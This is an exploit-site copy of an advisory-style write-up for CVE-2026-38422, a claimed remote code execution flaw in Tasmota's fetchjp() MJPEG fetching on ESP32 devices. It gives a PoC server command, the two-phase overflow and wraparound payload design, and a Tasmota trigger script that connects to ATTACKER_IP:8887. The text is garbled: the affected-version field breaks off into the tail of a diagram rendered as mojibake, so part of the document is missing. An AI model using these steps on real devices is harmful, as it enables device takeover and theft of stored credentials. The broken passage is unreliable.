Share
## https://sploitus.com/exploit?id=2428BCC8-F3C8-547C-A188-3E4136F74539
# CVE-2026-38422: Remote Code Execution via Combined Buffer Overflows in Tasmota fetch_jpg()

**CVE:** CVE-2026-38422  
**Severity:** Critical (CVSS 9.8)  
**Product:** Arendst Tasmota  
**Affected Version:**  65535
       โ”‚   Content-Length: 65537
       โ”‚   โ†’ uint16_t size = 1 (wraparound)
       โ”‚   โ†’ malloc(1), readBytes(buff, 1)
       โ”‚   โ†’ 65536 bytes remain in stream โ†’ heap/stream corruption
       โ–ผ
  Double Corruption โ†’ RCE / Guaranteed DoS
```

---

## Proof of Concept

```python
# Combined attack โ€” phase 1 + phase 2
python3 CVE-2026-38422_poc.py --port 8887 --mode dos
```

The PoC server:
1. Accepts connection from Tasmota (`fetchjp()` trigger)
2. **Phase 1:** Sends initial HTTP 200 with boundary string of 80 chars (overflow)
3. **Phase 2:** Sends MJPEG frames with `Content-Length: 65537` (wraparound)

See [CVE-2026-38422_poc.py](CVE-2026-38422_poc.py) for full implementation.

---

## Trigger via Tasmota Script

```
>D
>B
fetchjp(ATTACKER_IP:8887/stream,0,0,1)
>1
=fetchjp(2,0,0,1)
```

The device must be running a Tasmota script using `fetchjp()`. The attacker controls the server the device connects to (or performs MITM on an existing connection).

---

## Impact

- **Confidentiality:** High โ€” RCE on ESP32, access to device secrets/credentials
- **Integrity:** High โ€” full device takeover
- **Availability:** High โ€” guaranteed crash/reboot loop
- **Attack Vector:** Network (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- **CVSS Score:** 9.8 Critical

---

## Affected Devices

Any ESP32-based Tasmota device running version <= 15.3.0.3 with scripter support enabled and a script using `fetchjp()` to connect to an external MJPEG server.

---

## Timeline

- **2026-03-29:** Both vulnerabilities discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38422 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)

---

## References

- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38422
- Related: CVE-2026-38426 (strcpy overflow)
- Related: CVE-2026-38427 (uint16_t wraparound)